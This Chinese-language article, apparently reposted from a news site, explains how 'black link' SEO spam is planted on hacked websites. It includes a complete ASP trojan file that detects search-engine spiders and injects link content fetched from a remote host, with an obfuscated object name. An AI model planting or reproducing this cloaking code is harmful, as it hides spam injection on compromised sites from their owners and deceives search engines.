黑鏈是SEO手法中相當普遍的一種手段,籠統地說,它就是指一些人用非正常的手段獲取的其它網站的反向鏈接,最常見的黑鏈就是通過各種網站程序漏洞獲取搜索引擎權重或者PR較高的網站的WEBSHELL,進而在被黑網站上鏈接自己的網站。
黑客們做黑鏈的方式可能多種多樣,但手段其實只有兩種,一種是直接在目標網站上直接加上特定的鏈接代碼,另外一種只針對搜索引擎的訪問來做,讓搜索引擎誤認為目標站上存在著這樣的鏈接。下面對這兩種方法做一個詳細的解釋。
1.直接在目標頁面上加代碼:這應該是最普通的一種手段,也是很容易發現的手段。以前的黑鏈大部分都是采用這種手段來進行。首先需要入侵目標站的FTP,然後針對網站所用的程序,在模板或者其他的頁面加上“隱形”的鏈接。這種手段隱蔽性比較差,如果目標站的管理員懂得一定的SEO知識的話,很容易就會被發現。於是,更多的黑客開始使用第二個手段。
2.通過一段判定的代碼,判定來訪者的名稱和IP地址,如果來訪者是蜘蛛,則將另外一段包涵鏈接的代碼加入到目標頁面中。下面以一個ASP的例子進行說明:
黑客侵入到目標站的FTP,在程序裡留下2個木馬文件,一個文件名為int.asp,所包含的代碼為:
<%
On Error Resume Next user_agent=Request.ServerVariables(“HTTP_USER_AGENT”) httpuser=LCase(request.servervariables(“http_user_agent”))
if instr(httpuser,”baidu”)>0 or instr(httpuser,”google”)>0 or instr(httpuser,”sogou”)>0 or instr(httpuser,”soso”)>0
then Set ObjXMLHTTP=Server.createobject(“MSX”+”ML2.s”+”erv”+”erXML”+”HTTP”) ObjXMLHTTP.Open “GET”,”http://domain/a/193.txt”,False ObjXMLHTTP.send GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing set objStream = Server.CreateObject(“Adodb.Stream”) objStream.Type = 1
objStream.Mode =3 objStream.Open objStream.Write
GetHtml objStream.Position = 0 objStream.Type = 2 objStream.Charset = “gb2312″ GetHtml = objStream.ReadText objStream.Close key1=lcase(GetHtml) key1=Replace(key1&”",”-istxt-”,”")
response.Write key1 end if
%>
通過IP和訪問名稱判定來訪者是否為蜘蛛,將另外一個文件名字叫“193.txt”(主要是鏈接的代碼)的文件寫入到目標頁面中。這樣蜘蛛抓取的代碼跟我們看到的代碼是不一樣的。不管是檢查網頁源文件還是用站長工具,都沒辦法發現黑鏈的存在。只有一種辦法,那就是檢查快照存檔的代碼頁面,才能夠看出問題來。
第二種辦法雖然復雜了點,但是不容易被發現,就算用這種方法讓你的網站被K,你可能一時半刻都無法發現問題。實在屬於殺手級別的黑鏈手段。
本文來自:http://www.5jjdw.com/htmlcache/news/2012-08-01/161124.html,轉載請注明出處。
感謝 五金機電網 的投稿